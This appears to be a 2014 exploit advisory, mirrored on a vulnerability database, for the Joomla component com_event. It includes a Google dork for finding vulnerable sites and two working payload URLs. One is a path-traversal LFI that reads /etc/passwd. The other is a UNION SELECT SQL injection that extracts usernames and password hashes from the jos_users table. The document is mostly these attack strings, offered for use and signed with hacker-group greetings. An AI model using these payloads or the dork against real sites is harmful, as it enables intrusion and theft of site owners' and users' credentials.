Joomla Component com_event Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Joomla Component com_event Multiple Vulnerabilities. LFI and SQL exploit


                                                ####################################################################
&#62;&#62;&#62;&#62;&#62; Author : altbta ([email protected])
&#62;&#62;&#62;&#62;&#62; Home : [v4-team.com].[xp10.me]
&#62;&#62;&#62;&#62;&#62; Script : Joomla Component com_event
&#62;&#62;&#62;&#62;&#62; Bug Type : Multiple Vulnerabilities
&#62;&#62;&#62;&#62;&#62; Dork : inurl:&#34;com_event&#34;

####################################################################

===[ Exploit ]=== [LFI]

http://site/index.php?option=com_event&view=[LFI]
http://site/index.php?option=com_event&view=../../../../../../../../../../../../../../../etc/passwd%00
&#39;


===[ Exploit ]=== [sql]

http://site/index.php?option=com_event&task=details&sid=61 [sql]
http://site/index.php?option=com_event&task=details&sid=-61 union select
1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--


####################################################################
RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1